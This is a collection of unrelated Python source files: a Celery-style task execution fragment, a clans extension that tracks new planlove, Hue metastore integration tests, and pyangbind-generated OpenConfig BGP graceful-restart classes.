retval = tracer.execute()
self.acknowledge()
return retval
def send_event(self, type, **fields):
if self.eventer:
self.eventer.send(type, **fields)
def execute_using_pool(self, pool, loglevel=None, logfile=None):
"""Like :meth:`execute`, but using the :mod:`multiprocessing` pool.
:param pool: A :class:`multiprocessing.Pool` instance.
:keyword loglevel: The loglevel used by the task.
:keyword logfile: The logfile used by the task.
:returns :class:`multiprocessing.AsyncResult` instance.
"""
if self.revoked():
return
# Make sure task has not already been executed.
self._set_executed_bit()
args = self._get_tracer_args(loglevel, logfile)
self.time_start = time.time()
result = pool.apply_async(execute_and_trace, args=args,
accept_callback=self.on_accepted,
timeout_callback=self.on_timeout,
callbacks=[self.on_success], errbacks=[self.on_failure])
return result
def on_accepted(self):
state.task_accepted(self.task_name)
if not self.task.acks_late:
self.acknowledge()
self.send_event("task-started", uuid=self.task_id)
self.logger.debug("Task accepted: %s[%s]" % (
self.task_name, self.task_id))
def on_timeout(self, soft):
state.task_ready(self.task_name)
if soft:
self.logger.warning("Soft time limit exceeded for %s[%s]" % (
self.task_name, self.task_id))
else:
self.logger.error("Hard time limit exceeded for %s[%s]" % (
self.task_name, self.task_id))
def acknowledge(self):
if not self.acknowledged:
self.on_ack()
self.acknowledged = True
def on_success(self, ret_value):
"""The handler used if the task was successfully processed (
without raising an exception)."""
state.task_ready(self.task_name)
if self.task.acks_late:
self.acknowledge()
runtime = time.time() - self.time_start
self.send_event("task-succeeded", uuid=self.task_id,
result=repr(ret_value), runtime=runtime)
msg = self.success_msg.strip() % {
"id": self.task_id,
"name": self.task_name,
"return_value": ret_value}
self.logger.info(msg)
def on_failure(self, exc_info):
"""The handler used if the task raised an exception."""
state.task_ready(self.task_name)
if self.task.acks_late:
self.acknowledge()
self.send_event("task-failed", uuid=self.task_id,
exception=repr(exc_info.exception),
traceback=exc_info.traceback)
context = {
"hostname": self.hostname,
"id": self.task_id,
"name": self.task_name,
"exc": repr(exc_info.exception),
"traceback": unicode(exc_info.traceback, 'utf-8'),
"args": self.args,
"kwargs": self.kwargs,
}
self.logger.error(self.error_msg.strip() % context)
task_obj = tasks.get(self.task_name, object)
send_error_email = conf.CELERY_SEND_TASK_ERROR_EMAILS and not \
task_obj.disable_error_emails
if send_error_email:
subject = self.email_subject.strip() % context
body = self.email_body.strip() % context
mail_admins(subject, body, fail_silently=True)
|
|
"""
Newlove extension for clans.
Supports filtering for new planlove and ordering planlove by time.
"""
import json
from datetime import datetime
import os.path
import sys
import io
from clans.util import json_output, ISO8601_UTC_FMT
if sys.version_info < (3,):
str = unicode
# extension globals
lovelog = None
config = {}
class NewloveError(Exception):
"""Errors related to the newlove extension."""
pass
def post_load_commands(cs):
# read configured options into module-global dict
global config
if cs.config.has_section('newlove'):
config.update(dict(cs.config.items('newlove')))
extended_commands = ('love',)
if 'log_love' in config or 'log_search' in config:
# if configured to stalk, also add flags to clans search
extended_commands += ('search',)
for cmd in extended_commands:
cs.commands[cmd].add_argument(
'-t', '--time', dest='time',
action='store_true', default=False,
help="Order results by time first seen.")
cs.commands[cmd].add_argument(
'-n', '--new', dest='new',
action='store_true', default=False,
help="Only show new results.")
cs.commands[cmd].add_argument(
'--keep-unread', dest='keepunread',
action='store_true', default=False,
help="Preserve read state of any new results.")
def convert_dates(dic):
""" If a dict has a key named 'timestamp', convert to datetimes """
if 'timestamp' in dic:
timestamp = datetime.strptime(dic.pop('timestamp'), ISO8601_UTC_FMT)
dic['timestamp'] = timestamp
return dic
def _load_log(fl):
# ValueError would occur here if the JSON parse fails
return json.loads(str(fl.read()), object_hook=convert_dates)
def _save_log(newlove, fl):
fl.write(str(json_output(newlove)))
def _rebuild_log(log, results, timestamp=None):
"""
Given results of a search, build an updated version of the log.
This builds and returns a new log containing only entries present
in ``results``. Results not previously seen are timestamped with
the given time; others are passed through unmodified. If no
timestamp is specified, the current time is used.
This function also modifies the original log by deleting entries
that it finds in the results. When it completes, the original log
can be used as an index of results deleted since the original log
was built.
"""
newlog = {}
if timestamp is None:
timestamp = datetime.utcnow()
# rebuild log
for un, num, snips in results:
old_snips = log.get(un, {})
new_snips = {}
for snip in snips:
new_snips[snip] = old_snips.pop(
snip, dict(timestamp=timestamp, unread=True))
newlog[un] = new_snips
return newlog
def _flatten_log(log):
"""
Convert the nested-dict log format to a list of lovestate dicts.
The log is typically dictionaries of read/unread information,
in a doubly-nested dictionary indexed by the plan name and the
snippet. This converts that structure into a list of those dicts,
where the former indices (plan name and snippet) are added as
two extra entries to that dictionary.
"""
flattened = []
for un, snips in sorted(log.items()):
for snip, lovestate in sorted(snips.items()):
# make a copy when flattening
lovestate = dict(lover=un, text=snip, **lovestate)
flattened.append(lovestate)
return flattened
def modify_results(results, log, order_by_time=False, only_show_new=False):
"""
Modify the result list, in-place, to time-order or filter what is shown.
This takes a ``results`` list reference (as is passed to the
post_search hook) and uses the data in ``log`` to either weed out
results marked as read (if ``only_show_new`` is True), order the
results by the timestamp (if ``order_by_time`` is True), or both.
If neither of these is True (default), result list is not modified.
"""
if order_by_time:
# flatten nested dicts
flattened = _flatten_log(log)
# order by time
flattened.sort(key=lambda lovestate: lovestate['timestamp'])
# replace search results by time-ordered quicklove
del results[:]
for lovestate in flattened:
if only_show_new and not lovestate['unread']:
continue
note = lovestate['timestamp'].strftime(ISO8601_UTC_FMT)
results.append((lovestate['lover'], note, [lovestate['text'], ]))
elif only_show_new:
# don't change order, just hide snips we've seen before
for un, count, snips in results:
unread = [snip for snip in snips if log[un][snip]['unread']]
snips[:] = unread
def pre_search(cs, term, planlove=False):
"""
In this function, determine whether to track this search or not.
Track if:
- config file says to log all planlove searches
- config file says to log this specific planlove search
- absent any configured value, log our own planlove only
The config file format to log all planlove searches is:
[newlove]
log_love=
To log specific searches:
[newlove]
log_love=baldwint,gorp,climb
Absent a log_love directive, only searches for your own planlove
will be logged.
This also applies to non-planlove searches, using `log_search`
instead of `log_love`.
"""
global lovelog
global config
suffix = 'love' if planlove else 'search'
thing = config.get('log_%s' % suffix, None)
if thing is None:
# no configured value (default)
# log only our own planlove
logging = bool(planlove and (term == cs.username))
elif thing is '':
# log_love=
# wildcard option; log everybody
logging = True
else:
# if a value is given, take it as a comma separated list
# of searches to log
logging = bool(term in thing.split(','))
if logging:
# set location of log file (in app dir)
lovelog = '{term}.{suffix}'.format(term=term, suffix=suffix)
lovelog = os.path.join(cs.profile_dir, lovelog)
elif cs.args.get('time') or cs.args.get('new'):
# not tracking, but --time or --new was passed
raise NewloveError("Not configured to track '%s'" % term)
def post_search(cs, results):
global lovelog
if lovelog is None:
return
# load stored planlove
try:
fl = io.open(lovelog, 'r', encoding='utf8')
except IOError:
# no log file
oldlove = {}
else:
oldlove = _load_log(fl)
newlove = _rebuild_log(oldlove, results)
# if newlove flags are thrown, modify the displayed results
modify_results(results, newlove,
order_by_time=cs.args['time'],
only_show_new=cs.args['new'])
# mark all planlove as read
if not cs.args['keepunread']:
for dic in newlove.values():
for lovestate in dic.values():
if lovestate['unread']:
lovestate['unread'] = False
# store log
with io.open(lovelog, 'w', encoding='utf8') as fl:
_save_log(newlove, fl)
lovelog = None
# TODO: option to hoard deleted love
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import json
from nose.tools import assert_true, assert_equal, assert_false
from django.utils.encoding import smart_str
from django.contrib.auth.models import User, Group
from django.core.urlresolvers import reverse
import hadoop
from desktop.lib.django_test_util import make_logged_in_client, assert_equal_mod_whitespace
from desktop.lib.test_utils import add_permission, grant_access
from useradmin.models import HuePermission, GroupPermission, group_has_permission
from beeswax.conf import BROWSE_PARTITIONED_TABLE_LIMIT
from beeswax.views import collapse_whitespace
from beeswax.test_base import make_query, wait_for_query_to_finish, verify_history, get_query_server_config, fetch_query_result_data
from beeswax.models import QueryHistory
from beeswax.server import dbms
from beeswax.test_base import BeeswaxSampleProvider
LOG = logging.getLogger(__name__)
def _make_query(client, query, submission_type="Execute",
udfs=None, settings=None, resources=[],
wait=False, name=None, desc=None, local=True,
is_parameterized=True, max=30.0, database='default', email_notify=False, **kwargs):
"""Wrapper around the real make_query"""
res = make_query(client, query, submission_type,
udfs, settings, resources,
wait, name, desc, local, is_parameterized, max, database, email_notify, **kwargs)
# Should be in the history if it's submitted.
if submission_type == 'Execute':
fragment = collapse_whitespace(smart_str(query[:20]))
verify_history(client, fragment=fragment)
return res
class TestMetastoreWithHadoop(BeeswaxSampleProvider):
requires_hadoop = True
def setUp(self):
user = User.objects.get(username='test')
self.db = dbms.get(user, get_query_server_config())
def test_basic_flow(self):
# Default database should exist
response = self.client.get("/metastore/databases")
assert_true("default" in response.context["databases"])
# Table should have been created
response = self.client.get("/metastore/tables/")
assert_true("test" in response.context["tables"])
# Switch databases
response = self.client.get("/metastore/tables/default")
assert_true("test" in response.context["tables"])
# Should default to "default" database
response = self.client.get("/metastore/tables/not_there")
assert_true("test" in response.context["tables"])
# And have detail
response = self.client.get("/metastore/table/default/test")
assert_true("foo" in response.content)
assert_true("SerDe Library" in response.content, response.content)
# Remember the number of history items. Use a generic fragment 'test' to pass verification.
history_cnt = verify_history(self.client, fragment='test')
# Show table data.
response = self.client.get("/metastore/table/default/test/read", follow=True)
response = self.client.get(reverse("beeswax:api_watch_query_refresh_json", kwargs={'id': response.context['query'].id}), follow=True)
response = wait_for_query_to_finish(self.client, response, max=30.0)
# Note that it may not return all rows at once. But we expect at least 10.
results = fetch_query_result_data(self.client, response)
assert_true(len(results['results']) > 0)
# This should NOT go into the query history.
assert_equal(verify_history(self.client, fragment='test'), history_cnt, 'Implicit queries should not be saved in the history')
def test_describe_view(self):
resp = self.client.get('/metastore/table/default/myview')
assert_equal(None, resp.context['sample'])
assert_true(resp.context['table'].is_view)
assert_true("View" in resp.content)
assert_true("Drop View" in resp.content)
# Breadcrumbs
assert_true("default" in resp.content)
assert_true("myview" in resp.content)
def test_describe_partitions(self):
response = self.client.get("/metastore/table/default/test_partitions")
assert_true("Show Partitions (1)" in response.content, response.content)
response = self.client.get("/metastore/table/default/test_partitions/partitions", follow=True)
assert_true("baz_one" in response.content)
assert_true("boom_two" in response.content)
# Breadcrumbs
assert_true("default" in response.content)
assert_true("test_partitions" in response.content)
assert_true("partitions" in response.content)
# Not partitioned
response = self.client.get("/metastore/table/default/test/partitions", follow=True)
assert_true("is not partitioned." in response.content)
def test_browse_partitioned_table_with_limit(self):
# Limit to 90
finish = BROWSE_PARTITIONED_TABLE_LIMIT.set_for_testing("90")
try:
response = self.client.get("/metastore/table/default/test_partitions")
assert_true("0x%x" % 89 in response.content, response.content)
assert_false("0x%x" % 90 in response.content, response.content)
finally:
finish()
def test_browse_partitions(self):
response = self.client.get("/metastore/table/default/test_partitions/partitions/0", follow=True)
response = self.client.get(reverse("beeswax:api_watch_query_refresh_json", kwargs={'id': response.context['query'].id}), follow=True)
response = wait_for_query_to_finish(self.client, response, max=30.0)
results = fetch_query_result_data(self.client, response)
assert_true(len(results['results']) > 0, results)
def test_drop_multi_tables(self):
hql = """
CREATE TABLE test_drop_1 (a int);
CREATE TABLE test_drop_2 (a int);
CREATE TABLE test_drop_3 (a int);
"""
resp = _make_query(self.client, hql)
resp = wait_for_query_to_finish(self.client, resp, max=30.0)
# Drop them
resp = self.client.get('/metastore/tables/drop/default', follow=True)
assert_true('want to delete' in resp.content, resp.content)
resp = self.client.post('/metastore/tables/drop/default', {u'table_selection': [u'test_drop_1', u'test_drop_2', u'test_drop_3']})
assert_equal(resp.status_code, 302)
def test_drop_multi_databases(self):
hql = """
CREATE DATABASE test_drop_1;
CREATE DATABASE test_drop_2;
CREATE DATABASE test_drop_3;
"""
resp = _make_query(self.client, hql)
resp = wait_for_query_to_finish(self.client, resp, max=30.0)
# Drop them
resp = self.client.get('/metastore/databases/drop', follow=True)
assert_true('want to delete' in resp.content, resp.content)
resp = self.client.post('/metastore/databases/drop', {u'database_selection': [u'test_drop_1', u'test_drop_2', u'test_drop_3']})
assert_equal(resp.status_code, 302)
def test_load_data(self):
"""
Test load data queries.
These require Hadoop, because they ask the metastore
about whether a table is partitioned.
"""
# Check that view works
resp = self.client.get("/metastore/table/default/test/load", follow=True)
assert_true('Path' in resp.content)
# Try the submission
self.client.post("/metastore/table/default/test/load", dict(path="/tmp/foo", overwrite=True), follow=True)
query = QueryHistory.objects.latest('id')
assert_equal_mod_whitespace("LOAD DATA INPATH '/tmp/foo' OVERWRITE INTO TABLE `default`.`test`", query.query)
resp = self.client.post("/metastore/table/default/test/load", dict(path="/tmp/foo", overwrite=False), follow=True)
query = QueryHistory.objects.latest('id')
assert_equal_mod_whitespace("LOAD DATA INPATH '/tmp/foo' INTO TABLE `default`.`test`", query.query)
# Try it with partitions
resp = self.client.post("/metastore/table/default/test_partitions/load", dict(path="/tmp/foo", partition_0="alpha", partition_1="beta"), follow=True)
query = QueryHistory.objects.latest('id')
assert_equal_mod_whitespace(query.query, "LOAD DATA INPATH '/tmp/foo' INTO TABLE `default`.`test_partitions` PARTITION (baz='alpha', boom='beta')")
def test_has_write_access_frontend(self):
client = make_logged_in_client(username='write_access_frontend', groupname='write_access_frontend', is_superuser=False)
grant_access("write_access_frontend", "write_access_frontend", "metastore")
user = User.objects.get(username='write_access_frontend')
def check(client, assertz):
response = client.get("/metastore/databases")
assertz("Drop</button>" in response.content, response.content)
assertz("Create a new database" in response.content, response.content)
response = client.get("/metastore/tables/")
assertz("Drop</button>" in response.content, response.content)
assertz("Create a new table" in response.content, response.content)
check(client, assert_false)
# Add access
group, created = Group.objects.get_or_create(name='write_access_frontend')
perm, created = HuePermission.objects.get_or_create(app='metastore', action='write')
GroupPermission.objects.get_or_create(group=group, hue_permission=perm)
check(client, assert_true)
def test_has_write_access_backend(self):
client = make_logged_in_client(username='write_access_backend', groupname='write_access_backend', is_superuser=False)
grant_access("write_access_backend", "write_access_backend", "metastore")
grant_access("write_access_backend", "write_access_backend", "beeswax")
user = User.objects.get(username='write_access_backend')
resp = _make_query(client, 'CREATE TABLE test_perm_1 (a int);') # Only fails if we were using Sentry and won't allow SELECT to user
resp = wait_for_query_to_finish(client, resp, max=30.0)
def check(client, http_codes):
resp = client.get('/metastore/tables/drop/default')
assert_true(resp.status_code in http_codes, resp.content)
resp = client.post('/metastore/tables/drop/default', {u'table_selection': [u'test_perm_1']})
assert_true(resp.status_code in http_codes, resp.content)
check(client, [301]) # Denied
# Add access
group, created = Group.objects.get_or_create(name='write_access_backend')
perm, created = HuePermission.objects.get_or_create(app='metastore', action='write')
GroupPermission.objects.get_or_create(group=group, hue_permission=perm)
check(client, [200, 302]) # Ok
|
|
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class config(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/bgp/neighbors/neighbor/graceful-restart/config. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Configuration parameters relating to graceful-restart
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__enabled",
"__restart_time",
"__stale_routes_time",
"__helper_only",
)
_yang_name = "config"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__enabled = YANGDynClass(
base=YANGBool,
is_leaf=True,
yang_name="enabled",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
self.__restart_time = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
restriction_dict={"range": ["0..4096"]},
),
is_leaf=True,
yang_name="restart-time",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint16",
is_config=True,
)
self.__stale_routes_time = YANGDynClass(
base=RestrictedPrecisionDecimalType(precision=2),
is_leaf=True,
yang_name="stale-routes-time",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="decimal64",
is_config=True,
)
self.__helper_only = YANGDynClass(
base=YANGBool,
is_leaf=True,
yang_name="helper-only",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"bgp",
"neighbors",
"neighbor",
"graceful-restart",
"config",
]
def _get_enabled(self):
"""
Getter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/enabled (boolean)
YANG Description: Enable or disable the graceful-restart capability.
"""
return self.__enabled
def _set_enabled(self, v, load=False):
"""
Setter method for enabled, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/enabled (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_enabled is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_enabled() directly.
YANG Description: Enable or disable the graceful-restart capability.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
is_leaf=True,
yang_name="enabled",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """enabled must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=True)""",
}
)
self.__enabled = t
if hasattr(self, "_set"):
self._set()
def _unset_enabled(self):
self.__enabled = YANGDynClass(
base=YANGBool,
is_leaf=True,
yang_name="enabled",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
def _get_restart_time(self):
"""
Getter method for restart_time, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/restart_time (uint16)
YANG Description: Estimated time (in seconds) for the local BGP speaker to
restart a session. This value is advertise in the graceful
restart BGP capability. This is a 12-bit value, referred to
as Restart Time in RFC4724. Per RFC4724, the suggested
default value is <= the hold-time value.
"""
return self.__restart_time
def _set_restart_time(self, v, load=False):
"""
Setter method for restart_time, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/restart_time (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_restart_time is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_restart_time() directly.
YANG Description: Estimated time (in seconds) for the local BGP speaker to
restart a session. This value is advertise in the graceful
restart BGP capability. This is a 12-bit value, referred to
as Restart Time in RFC4724. Per RFC4724, the suggested
default value is <= the hold-time value.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int,
restriction_dict={"range": ["0..65535"]},
int_size=16,
),
restriction_dict={"range": ["0..4096"]},
),
is_leaf=True,
yang_name="restart-time",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint16",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """restart_time must be of a type compatible with uint16""",
"defined-type": "uint16",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), restriction_dict={'range': ['0..4096']}), is_leaf=True, yang_name="restart-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint16', is_config=True)""",
}
)
self.__restart_time = t
if hasattr(self, "_set"):
self._set()
def _unset_restart_time(self):
self.__restart_time = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
restriction_dict={"range": ["0..4096"]},
),
is_leaf=True,
yang_name="restart-time",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint16",
is_config=True,
)
def _get_stale_routes_time(self):
"""
Getter method for stale_routes_time, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/stale_routes_time (decimal64)
YANG Description: An upper-bound on the time thate stale routes will be
retained by a router after a session is restarted. If an
End-of-RIB (EOR) marker is received prior to this timer
expiring stale-routes will be flushed upon its receipt - if
no EOR is received, then when this timer expires stale paths
will be purged. This timer is referred to as the
Selection_Deferral_Timer in RFC4724
"""
return self.__stale_routes_time
def _set_stale_routes_time(self, v, load=False):
"""
Setter method for stale_routes_time, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/stale_routes_time (decimal64)
If this variable is read-only (config: false) in the
source YANG file, then _set_stale_routes_time is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_stale_routes_time() directly.
YANG Description: An upper-bound on the time thate stale routes will be
retained by a router after a session is restarted. If an
End-of-RIB (EOR) marker is received prior to this timer
expiring stale-routes will be flushed upon its receipt - if
no EOR is received, then when this timer expires stale paths
will be purged. This timer is referred to as the
Selection_Deferral_Timer in RFC4724
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedPrecisionDecimalType(precision=2),
is_leaf=True,
yang_name="stale-routes-time",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="decimal64",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """stale_routes_time must be of a type compatible with decimal64""",
"defined-type": "decimal64",
"generated-type": """YANGDynClass(base=RestrictedPrecisionDecimalType(precision=2), is_leaf=True, yang_name="stale-routes-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='decimal64', is_config=True)""",
}
)
self.__stale_routes_time = t
if hasattr(self, "_set"):
self._set()
def _unset_stale_routes_time(self):
self.__stale_routes_time = YANGDynClass(
base=RestrictedPrecisionDecimalType(precision=2),
is_leaf=True,
yang_name="stale-routes-time",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="decimal64",
is_config=True,
)
def _get_helper_only(self):
"""
Getter method for helper_only, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/helper_only (boolean)
YANG Description: Enable graceful-restart in helper mode only. When this
leaf is set, the local system does not retain forwarding
its own state during a restart, but supports procedures
for the receiving speaker, as defined in RFC4724.
"""
return self.__helper_only
def _set_helper_only(self, v, load=False):
"""
Setter method for helper_only, mapped from YANG variable /network_instances/network_instance/protocols/protocol/bgp/neighbors/neighbor/graceful_restart/config/helper_only (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_helper_only is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_helper_only() directly.
YANG Description: Enable graceful-restart in helper mode only. When this
leaf is set, the local system does not retain forwarding
its own state during a restart, but supports procedures
for the receiving speaker, as defined in RFC4724.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=YANGBool,
is_leaf=True,
yang_name="helper-only",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """helper_only must be of a type compatible with boolean""",
"defined-type": "boolean",
"generated-type": """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="helper-only", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=True)""",
}
)
self.__helper_only = t
if hasattr(self, "_set"):
self._set()
def _unset_helper_only(self):
self.__helper_only = YANGDynClass(
base=YANGBool,
is_leaf=True,
yang_name="helper-only",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
enabled = __builtin__.property(_get_enabled, _set_enabled)
restart_time = __builtin__.property(_get_restart_time, _set_restart_time)
stale_routes_time = __builtin__.property(
_get_stale_routes_time, _set_stale_routes_time
)
helper_only = __builtin__.property(_get_helper_only, _set_helper_only)
_pyangbind_elements = OrderedDict(
[
("enabled", enabled),
("restart_time", restart_time),
("stale_routes_time", stale_routes_time),
("helper_only", helper_only),
]
)
class config(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/bgp/neighbors/neighbor/graceful-restart/config. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Configuration parameters relating to graceful-restart
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__enabled",
"__restart_time",
"__stale_routes_time",
"__helper_only",
)
_yang_name = "config"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__enabled = YANGDynClass(
base=YANGBool,
is_leaf=True,
yang_name="enabled",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
self.__restart_time = YANGDynClass(
base=RestrictedClassType(
base_type=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
restriction_dict={"range": ["0..4096"]},
),
is_leaf=True,
yang_name="restart-time",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint16",
is_config=True,
)
self.__stale_routes_time = YANGDynClass(
base=RestrictedPrecisionDecimalType(precision=2),
is_leaf=True,
yang_name="stale-routes-time",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="decimal64",
is_config=True,
)
self.__helper_only = YANGDynClass(
base=YANGBool,
is_leaf=True,
yang_name="helper-only",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="boolean",
is_config=True,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"bgp",
"neighbors",
"neighbor",
"graceful-restart",
"config",
]
def _get_enabled(self):
"""
